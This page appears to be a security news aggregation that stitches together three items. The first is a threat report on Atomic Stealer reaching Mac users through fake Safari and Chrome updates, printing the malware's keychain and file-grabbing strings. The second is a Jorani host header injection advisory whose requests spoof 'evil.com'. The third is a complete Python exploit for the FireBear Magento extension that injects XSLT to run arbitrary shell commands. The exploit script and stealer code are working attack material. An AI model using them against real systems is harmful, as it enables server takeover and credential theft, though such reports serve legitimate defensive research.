Compromised websites are being used to redirect to fake browser updates and deliver malware onto Mac users.

Atomic Stealer, also known as AMOS, is a popular stealer for Mac OS. Back in September, we described how malicious ads were tricking victims into downloading this piece of malware under the disguise of a popular application.

In an interesting new development, AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. This may very well be the first time we see one of the main social engineering campaigns, previously reserved for Windows, branch out not only in terms of geolocation but also operating system.

With a growing list of compromised sites at their disposal, the threat actors are able to reach out a wider audience, stealing credentials and files of interest that can be monetized immediately or repurposed for additional attacks.

**Discovery**

ClearFake is a newer malware campaign that leverages compromised websites to distribute fake browser updates. It was originally discovered by Randy McEoin in August and has since gone through a number of upgrades, including the use of smart contracts to build its redirect mechanism, making it one of the most prevalent and dangerous social engineering schemes.

On November 17, security researcher Ankit Anubhav observed that ClearFake was distributed to Mac users as well with a corresponding payload:

The Safari template mimics the official Apple website and is available in different languages:

Since Google Chrome is also popular on Macs, there is a template for it which closely resembles the one used for Windows users:

**Atomic Stealer**

The payload is made for for Mac users, a DMG file purporting to be a Safari or Chrome update. Victims are instructed on how to open the file which immediately runs commands after prompting for the administrative password.

Looking at the strings from the malicious application, we can see those commands which include password and file grabbing capabilities:

find-generic-password -ga 'Chrome' | awk '{print $2}' SecKeychainSearchCopyNext:
/Chromium/Chrome /Chromium/Chrome/Local State FileGrabber tell application "Finder"
set desktopFolder to path to desktop folder
set documentsFolder to path to documents folder
set srcFiles to every file of desktopFolder whose name extension is in {"txt", "rtf", "doc", "docx", "xls", "key", "wallet", "jpg", "png", "web3", "dat"}
set docsFiles to every file of documentsFolder whose name extension is in {"txt", "rtf", "doc", "docx", "xls", "key", "wallet", "jpg", "png", "web3", "dat"}

In the same file, we can find the malware’s command and control server where the stolen data is sent to:

**Macs need protection too**

Fake browser updates have been a common theme for Windows users for years, and yet up until now the threat actors didn’t expand onto MacOS in a consistent way. The popularity of stealers such as AMOS makes it quite easy to adapt the payload to different victims, with minor adjustments.

Because ClearFake has become one of the main social engineering campaigns recently, Mac users should pay particular attention to it. We recommend leveraging web protection tools to block the malicious infrastructure associated with this threat actor.

Malwarebytes users are protected against Atomic Stealer:

**Indicators of Compromise**

Malicious domains

longlakeweb\[.\]com
chalomannoakhali\[.\]com
jaminzaidad\[.\]com
royaltrustrbc\[.\]com

AMOS stealer

4cb531bd83a1ebf4061c98f799cdc2922059aff1a49939d427054a556e89f464  
be634e786d5d01b91f46efd63e8d71f79b423bfb2d23459e5060a9532b4dcc7b

AMOS C2

194.169.175\[.\]117

 Atomic Stealer distributed to Mac users via fake browser updates 

Jorani Leave Management System version 1.0.2 suffers from a host header injection vulnerability.

    # Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)# Vendor Homepage: https://jorani.org/# Software Link:https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip# Version: v1.0.2# Tested on: Windows 10, PHP version: 8.2.4, Apache/2.4.56# CVE: CVE-2023-48205Descriptions:A Host Header Injection vulnerability in Jorani Leave Management System1.0.2 may allow an attacker to spoof a particular header. This can beexploited by abusing password reset emails.Steps to Reproduce:1. Request:GET /jorani/session/login HTTP/1.1Host: 192.168.1.74Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/119.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Sec-GPC: 1Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brCookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;jorani_session=pqop598dtj85okrjvh043es6pqp1juagConnection: close2. Now change host name and check browser response. So your request datawill be:GET /jorani/session/login HTTP/1.1Host: evil.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/119.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Sec-GPC: 1Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brCookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;jorani_session=pqop598dtj85okrjvh043es6pqp1juagConnection: close## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48205)

Jorani Leave Management System 1.0.2 Host Header Injection

FireBear Improved Import and Export version 3.8.6 for Magento 2.4.6 suffers from an XSLT server-side injection vulnerability that allows for command execution.

    Exploit Title: FireBear Improved Import & Export ver. 3.8.6 for Magento 2.4.6  - XSLT Server Side Injection Command Execution# Date: 2023-11-17# Exploit Author: tmrswrr# Vendor Homepage: https://commercemarketplace.adobe.com/# Software Link:  https://commercemarketplace.adobe.com/firebear-importexport.html# Version: FireBear ver. 3.8.6# Tested on: Magento 2.4.6Poc:https://github.com/capture0x/Magento-ver.-2.4.6/Exploit:import requestsfrom bs4 import BeautifulSoupimport reimport json import sysif len(sys.argv) != 3:    print("Usage: python exploit.py <base_url> <command>")    sys.exit(1)base_url = sys.argv[1]command = sys.argv[2]base_url = base_url.rstrip('/') + '/'login_page_url = base_url + "admin/"login_action_url = base_url + "admin/"import_job_edit_url = base_url + "import/job/edit/entity_id/21/" session = requests.Session() response = session.get(login_page_url)soup = BeautifulSoup(response.text, 'html.parser')form_key = soup.find('input', {'name': 'form_key'})['value']login_payload = {    'form_key': form_key,    'login[username]': 'demo',    'login[password]': '1q2w3e4r5t'} headers = {    'Content-Type': 'application/x-www-form-urlencoded',    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'} login_response = session.post(login_action_url, headers=headers, data=login_payload) if login_response.ok and login_response.history:    print("Login successful!")    redirected_url = login_response.url    print("Redirected URL:", redirected_url)         import_job_edit_response = session.get(import_job_edit_url)    soup = BeautifulSoup(import_job_edit_response.text, 'html.parser')    second_form_key = soup.find('input', {'name': 'form_key'})['value']    print("Extracted Key")        key = re.findall(r'key\/(.*?)\/', login_response.url)[0]         second_post_url = f"{base_url}import/job/xslt/key/{key}/?isAjax=true"            second_post_payload = f"form_data%5B%5D=file_path%2Bpub%2Fmedia%2Fimportexport%2Fh%2Fe%2Fhello_39.xml&form_data%5B%5D=xslt%2B%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0A%3Cxsl%3Astylesheet+version%3D%221.0%22%0Axmlns%3Axsl%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2FTransform%22%0Axmlns%3Aphp%3D%22http%3A%2F%2Fphp.net%2Fxsl%22%3E%0A%3Cxsl%3Atemplate+match%3D%22%2F%22%3E%0A%3Cxsl%3Avalue-of+select%3D%22php%3Afunction('shell_exec'%2C'{command}')%22+%2F%3E%0A%3C%2Fxsl%3Atemplate%3E%0A%3C%2Fxsl%3Astylesheet%3E&form_data%5B%5D=import_source%2Bfile&form_data%5B%5D=type_file%2Bxml&form_data%5B%5D=host%2B&form_data%5B%5D=port%2B&form_data%5B%5D=username%2B&form_data%5B%5D=password%2B&form_data%5B%5D=type_file%2Bxml&form_data%5B%5D=import_source%2Bfile&form_data%5B%5D=file_upload%2B&form_data%5B%5D=predefined_structure%2B0&form_data%5B%5D=file_path%2Bpub%2Fmedia%2Fimportexport%2Fh%2Fe%2Fhello_39.xml&form_data%5B%5D=import_images_file_dir%2B&form_data%5B%5D=scan_directory%2B0&form_data%5B%5D=deferred_images%2B0&form_data%5B%5D=delete_file_after_import%2B0&form_data%5B%5D=archive_file_after_import%2B0&form_data%5B%5D=image_import_source%2B0&form_data%5B%5D=remove_current_mappings%2B0&form_data%5B%5D=associate_child_review_to_configurable_parent_product%2B0&form_data%5B%5D=associate_child_review_to_bundle_parent_product%2B0&form_key={second_form_key}"       second_post_headers = {        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',        'Referer': import_job_edit_response.url       }         second_post_response = session.post(second_post_url, headers=second_post_headers, data=second_post_payload)         if second_post_response.ok:        print("XSL Imported!")        response_json = json.loads(second_post_response.text)                result_xml = response_json.get("result", "")        if result_xml is not None:                     result_xml = result_xml.replace("<?xml version=\"1.0\"?>", "\n")                else:                      result_xml = "No Output found in the response."                print("Output:", result_xml)            else:        print("Import failed.")        print("Status Code:", second_post_response.status_code)        print("Response:", second_post_response.text)else:    print("Login failed.") session.close()

Tag

#chrome